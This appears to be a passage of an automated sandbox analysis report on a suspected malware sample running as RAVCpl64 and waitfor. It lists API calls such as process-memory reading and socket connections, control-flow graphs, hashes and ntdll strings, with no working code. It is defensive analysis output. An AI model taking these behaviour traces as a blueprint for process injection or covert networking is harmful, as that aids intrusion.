                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: send
                                                                              • String ID:
                                                                              • API String ID: 2809346765-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: connect
                                                                              • String ID:
                                                                              • API String ID: 1959786783-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: socket
                                                                              • String ID:
                                                                              • API String ID: 98920635-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: CreateThread
                                                                              • String ID:
                                                                              • API String ID: 2422867632-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: closesocket
                                                                              • String ID:
                                                                              • API String ID: 2781271927-0
                                                                              • Opcode ID: 4d4ba5f31d0269f8d77df5daea61cfdc5f39e0472f98af54e051310692a54deb
                                                                              • Instruction ID: 6def2a37ff7db591a53ba12b612467554a2be830d8b83544667b1e5277405031
                                                                              • Opcode Fuzzy Hash: 4d4ba5f31d0269f8d77df5daea61cfdc5f39e0472f98af54e051310692a54deb
                                                                              • Instruction Fuzzy Hash: 91010C3451CB489FDB90FF28D08879BB7E1FBA8341F44466EE98DCB255DB3481448B56

                                                                              Execution Graph

                                                                              Execution Coverage:0.4%
                                                                              Dynamic/Decrypted Code Coverage:88.2%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:17
                                                                              Total number of Limit Nodes:2
                                                                              execution_graph 82814 4da1e98 82815 4da1ef0 82814->82815 82816 4da1f24 82815->82816 82819 4d9f038 82815->82819 82818 4da1f01 82820 4d9f05d 82819->82820 82821 4d9f1da NtQueryInformationProcess 82820->82821 82824 4d9f24d 82820->82824 82822 4d9f214 82821->82822 82823 4d9f2f2 NtReadVirtualMemory 82822->82823 82822->82824 82823->82824 82824->82818 82825 8e9a67 NtClose 82826 8e9a98 82825->82826 82828 4ab2b20 82830 4ab2b2a 82828->82830 82831 4ab2b3f LdrInitializeThunk 82830->82831 82832 4ab2b31 82830->82832 82841 4ab29f0 LdrInitializeThunk

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 4d9f038-4d9f05b 1 4d9f079-4d9f099 call 4da1308 call 4d9d0a8 0->1 2 4d9f05d-4d9f074 call 4da12e8 0->2 8 4d9f68a-4d9f695 1->8 9 4d9f09f-4d9f1ab call 4d9ef68 call 4da1308 call 4da5274 call 4d90398 call 4da08c8 call 4d90398 call 4da08c8 call 4da2fd8 1->9 2->1 26 4d9f67e-4d9f685 call 4d9ef68 9->26 27 4d9f1b1-4d9f24b call 4d90398 call 4da08c8 NtQueryInformationProcess call 4da1308 call 4d90398 call 4da08c8 9->27 26->8 39 4d9f24d-4d9f25a 27->39 40 4d9f25f-4d9f2db call 4da5282 call 4d90398 call 4da08c8 27->40 39->26 40->39 49 4d9f2e1-4d9f2f0 call 4da52ac 40->49 52 4d9f33d-4d9f383 call 4d90398 call 4da08c8 call 4da3938 49->52 53 4d9f2f2-4d9f333 NtReadVirtualMemory call 4da1ff8 49->53 62 4d9f3a2-4d9f49e call 4d90398 call 4da08c8 call 4da52ba call 4d90398 call 4da08c8 call 4da32f8 call 4da12b8 * 3 call 4da52ac 52->62 63 4d9f385-4d9f39d 52->63 56 4d9f338 53->56 56->26 86 4d9f4d1-4d9f4e6 call 4da52ac 62->86 87 4d9f4a0-4d9f4cf call 4da52ac call 4da12b8 call 4da530e call 4da52c8 62->87 63->26 92 4d9f4e8-4d9f50a call 4da2aa8 86->92 93 4d9f50f-4d9f521 call 4da1f38 86->93 98 4d9f526-4d9f530 87->98 92->93 93->98 100 4d9f5f5-4d9f65e call 4d90398 call 4da08c8 call 4da3c58 98->100 101 4d9f536-4d9f586 call 4d90398 call 4da08c8 call 4da3618 call 4da52ac 98->101 100->26 126 4d9f660-4d9f679 call 4da12e8 100->126 120 4d9f588-4d9f5b1 call 4da5358 call 4da530e 101->120 121 4d9f5bb-4d9f5c3 call 4da52ac 101->121 120->121 121->100 130 4d9f5c5-4d9f5d0 121->130 126->26 130->100 132 4d9f5d2-4d9f5f0 call 4da3f78 130->132 132->100
                                                                              APIs
                                                                              • NtQueryInformationProcess.NTDLL ref: 04D9F1F9
                                                                              • NtReadVirtualMemory.NTDLL ref: 04D9F30D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16928575855.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4d90000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InformationMemoryProcessQueryReadVirtual
                                                                              • String ID: 0$~,VH$OR+
                                                                              • API String ID: 1498878907-4020732180
                                                                              • Opcode ID: 5d4d39e875c25aa832bc67a7086d0fc650dbfabbd9594b02e507059220aecd91
                                                                              • Instruction ID: e4b59be7d9d7a6175d5f74e47c4132f570d04204ceffa2de5fa3b5058ccd8536
                                                                              • Opcode Fuzzy Hash: 5d4d39e875c25aa832bc67a7086d0fc650dbfabbd9594b02e507059220aecd91
                                                                              • Instruction Fuzzy Hash: 34023F70618A8C9FDFA5EF68C894ADE77E1FB99304F40061ED88AC7244DF34E6458B52

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 134 8e9a67-8e9a90 NtClose 135 8e9a98-8e9aa5 134->135
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16925701076.00000000008C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_8c0000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: bd7927d976b0e10c3aa9637b3a0958410aa6209ded68882e1a7740e87cbd5ffc
                                                                              • Instruction ID: 5cddf97871bb505070435a55c5f37363b8e4718735b2c40b37f3ee4e63c7664d
                                                                              • Opcode Fuzzy Hash: bd7927d976b0e10c3aa9637b3a0958410aa6209ded68882e1a7740e87cbd5ffc
                                                                              • Instruction Fuzzy Hash: 1EE07D5659D3CA8CC700BBF4C81435E7FA0AE06734B1C8F9CC8F10A487CA011C86CB00

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 151 4ab2cf0-4ab2cfc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 49d6fe2caa93ae328e5487e706186fb2e2a4f69f26d08a383fe43127b7d44727
                                                                              • Instruction ID: 79fb835083f53ff5b969b715eb7c46f693cce3a9e61c703eeb514e8210322d07
                                                                              • Opcode Fuzzy Hash: 49d6fe2caa93ae328e5487e706186fb2e2a4f69f26d08a383fe43127b7d44727
                                                                              • Instruction Fuzzy Hash: E9900221242041527D85B55845045074006ABE02C6791C41EA1415990CC53AE856E721

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 150 4ab2c30-4ab2c3c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: e178a48f50c5ca64819f3655ea3d7a88113d9ac794d0734e082708c8d0c4e0f0
                                                                              • Instruction ID: 2617b101b9fa86f212733ba6c3a869d2317b50e94d22aa41ec9d956181ac9356
                                                                              • Opcode Fuzzy Hash: e178a48f50c5ca64819f3655ea3d7a88113d9ac794d0734e082708c8d0c4e0f0
                                                                              • Instruction Fuzzy Hash: F390022921300002F9C07558550860A00059BD1287F91D81DA0016598CC939D8696321

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 152 4ab2d10-4ab2d1c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 83d6e5e082b0c5d97e6232f1e41431018f0e2472cfa2298efc8e33381f4244dc
                                                                              • Instruction ID: 53a17c88de58fedb2c4dcdcc161c3431e964bbd36450c8002a49a77cc6080d65
                                                                              • Opcode Fuzzy Hash: 83d6e5e082b0c5d97e6232f1e41431018f0e2472cfa2298efc8e33381f4244dc
                                                                              • Instruction Fuzzy Hash: F790023120100413F9517558460470700099BD02C6F91C81EA0425598DD67AD952B221
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: afa3af3055752d97f2bc7723a213c8aa3f025232f3b70cdf29b1f5e9307f1bec
                                                                              • Instruction ID: 7899796492c72f06630fe4d0b7385767a6c1e073dc5c0bca2ec39f99b92bc34b
                                                                              • Opcode Fuzzy Hash: afa3af3055752d97f2bc7723a213c8aa3f025232f3b70cdf29b1f5e9307f1bec
                                                                              • Instruction Fuzzy Hash: 4490026134100442F94075584514B060005DBE1386F51C41DE1065594DC63DDC527226
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5659f236ce9fdf59961b8b3fb0d878dab9da94b24fd5f8839588c39f406c4a4a
                                                                              • Instruction ID: 43205dfa78b24f046f620d38cb2b15b8e60f0f8ab695ae32bdf54afea295cfdb
                                                                              • Opcode Fuzzy Hash: 5659f236ce9fdf59961b8b3fb0d878dab9da94b24fd5f8839588c39f406c4a4a
                                                                              • Instruction Fuzzy Hash: 9890022121180042FA4079684D14B0700059BD0387F51C51DA0155594CC939D8616621

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 141 4ab29f0-4ab29fc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 33ddb7d7e541eca813c1ef17109929099548d59ef2f117070b6b26e22219daac
                                                                              • Instruction ID: 0c4ec45b74c4f7d07c6d060759dfd72236a59b74f1bac24252f126ac7d3ed782
                                                                              • Opcode Fuzzy Hash: 33ddb7d7e541eca813c1ef17109929099548d59ef2f117070b6b26e22219daac
                                                                              • Instruction Fuzzy Hash: 86900225211000033945B958070450700469BD53D6351C42DF1016590CD635D8616221

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 143 4ab2a80-4ab2a8c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 68d67206a96460d5d9609fdee85414a77d38ffc2acee56c94357e0b6cd542832
                                                                              • Instruction ID: 572a753a3712ccecd3fde6dd2faecedc7771228ddf1691436b5c5bd685612314
                                                                              • Opcode Fuzzy Hash: 68d67206a96460d5d9609fdee85414a77d38ffc2acee56c94357e0b6cd542832
                                                                              • Instruction Fuzzy Hash: FF90026120200003794575584514616400A9BE0286B51C42DE10155D0DC539D8917225

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 144 4ab2ac0-4ab2acc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 1fd484809410013baf005dfeacc8c5a56bf5b28397311ed7fcb1bc663ea6049c
                                                                              • Instruction ID: 0b928b142ba22ac3e93928f9b2709cdae2ec441c3943c1fb1aa03501db9ec868
                                                                              • Opcode Fuzzy Hash: 1fd484809410013baf005dfeacc8c5a56bf5b28397311ed7fcb1bc663ea6049c
                                                                              • Instruction Fuzzy Hash: 8E90023160500802F9907558451474600059BD0386F51C41DA0025694DC779DA5577A1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 142 4ab2a10-4ab2a1c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 2e1dff9a5a53592d73629731aee43bad136c4661d7ebb0ba204e309ee88172aa
                                                                              • Instruction ID: d17a890269e612dfa4de97e4327c7736b9700ef60d1a3e373c9ac9e8d94ce91f
                                                                              • Opcode Fuzzy Hash: 2e1dff9a5a53592d73629731aee43bad136c4661d7ebb0ba204e309ee88172aa
                                                                              • Instruction Fuzzy Hash: 4A900225221000023985B958070450B0445ABD63D6391C41DF14175D0CC635D8656321

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 147 4ab2b80-4ab2b8c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c3285543a26462a679b34c4e5c8116e20cf64b78d9b0156d8b86c8b42079cc0d
                                                                              • Instruction ID: 3cbea80f3cd935a439a330928982a1b5a524eb51c9d4d1b3e82ac7efe3bea2bd
                                                                              • Opcode Fuzzy Hash: c3285543a26462a679b34c4e5c8116e20cf64b78d9b0156d8b86c8b42079cc0d
                                                                              • Instruction Fuzzy Hash: 6890023120100842F94075584504B4600059BE0386F51C41EA0125694DC639D8517621

                                                                              Control-flow Graph

                                                                              control_flow_graph 148 4ab2b90-4ab2b9c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0

                                                                              Control-flow Graph

                                                                              control_flow_graph 149 4ab2bc0-4ab2bcc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0

                                                                              Control-flow Graph

                                                                              control_flow_graph 145 4ab2b00-4ab2b0c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0

                                                                              Control-flow Graph

                                                                              control_flow_graph 146 4ab2b10-4ab2b1c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0

                                                                              Control-flow Graph

                                                                              control_flow_graph 137 4ab2b2a-4ab2b2f 138 4ab2b3f-4ab2b46 LdrInitializeThunk 137->138 139 4ab2b31-4ab2b38 137->139
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              Strings
                                                                              • Execute=1, xrefs: 04AE451E
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04AE4530
                                                                              • ExecuteOptions, xrefs: 04AE44AB
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04AE4592
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04AE454D
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04AE4460
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04AE4507
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$@
                                                                              • API String ID: 0-1194432280